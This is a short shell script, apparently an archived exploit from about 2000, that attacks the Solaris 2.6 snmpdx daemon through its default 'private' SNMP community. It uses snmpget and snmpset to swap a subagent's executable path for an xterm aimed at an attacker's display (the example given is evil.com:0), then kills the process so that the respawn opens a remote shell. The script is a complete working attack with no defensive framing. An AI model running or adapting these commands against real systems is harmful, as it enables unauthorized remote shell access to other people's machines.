home *** CD-ROM | disk | FTP | other *** search
- #!/bin/sh
- #
- # Solaris 2.6 snmpdx private and lame remote exploit by acz@hert.org
- #
-
- if [ $# -ne 2 ]; then
- echo "Usage: $0 <target> <evil_display>"
- echo " eg. $0 example.com evil.com:0"
- exit
- fi
-
- export TARGET=$1
- export EVIL_DISPLAY=$2
-
-
- PID=`snmpget 2>/dev/null $TARGET private .1.3.6.1.4.1.42.2.15.8.1.9.2|awk '{print $3}'`
- echo Process id of 2nd subagent: $PID $TARGET
- snmpget 2>/dev/null $TARGET private .1.3.6.1.4.1.42.2.15.8.1.7.2
- echo "Replacing Executable Path for 2nd subagent"
- eval 'snmpset 2>/dev/null $TARGET private .1.3.6.1.4.1.42.2.15.8.1.7.2 s "/usr/openwin/bin/xterm -display $EVIL_DISPLAY -ut"'
- echo "Sending signal -KILL to process id $PID on $TARGET"
- snmpset 2>/dev/null $TARGET 'all private' .1.3.6.1.4.1.42.3.12.1.1.11.$PID i 9
- echo "Wait for xterm now"
- # www.hack.co.za [2000]#